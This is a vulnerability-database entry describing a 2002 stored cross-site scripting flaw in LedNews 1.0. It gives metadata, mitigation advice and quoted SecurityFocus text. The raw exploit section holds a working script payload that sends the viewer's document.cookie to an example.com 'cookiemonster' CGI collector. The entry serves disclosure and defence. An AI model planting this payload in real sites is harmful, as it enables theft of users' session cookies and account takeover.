header-logo
Suggest Exploit
vendor:
LedNews
by:
SecurityFocus
8.8
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: LedNews
Affected Version From: LedNews 1.0
Affected Version To: LedNews 1.0
Patch Exists: YES
Related CWE: CVE-2002-0753
CPE: a:lednews:lednews:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

LedNews Cross-Site Scripting Vulnerability

LedNews is vulnerable to Cross-Site Scripting (XSS) attacks due to insufficient input validation. An attacker can inject malicious JavaScript code into a news post, which will be executed when a user views the post. This can be used to steal authentication cookies, redirect users to malicious websites, or perform other malicious activities.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7920/info

It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities. 

<script>
document.location.replace('http://www.example.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script>

Navigation

Suggest Exploit

Services By CQR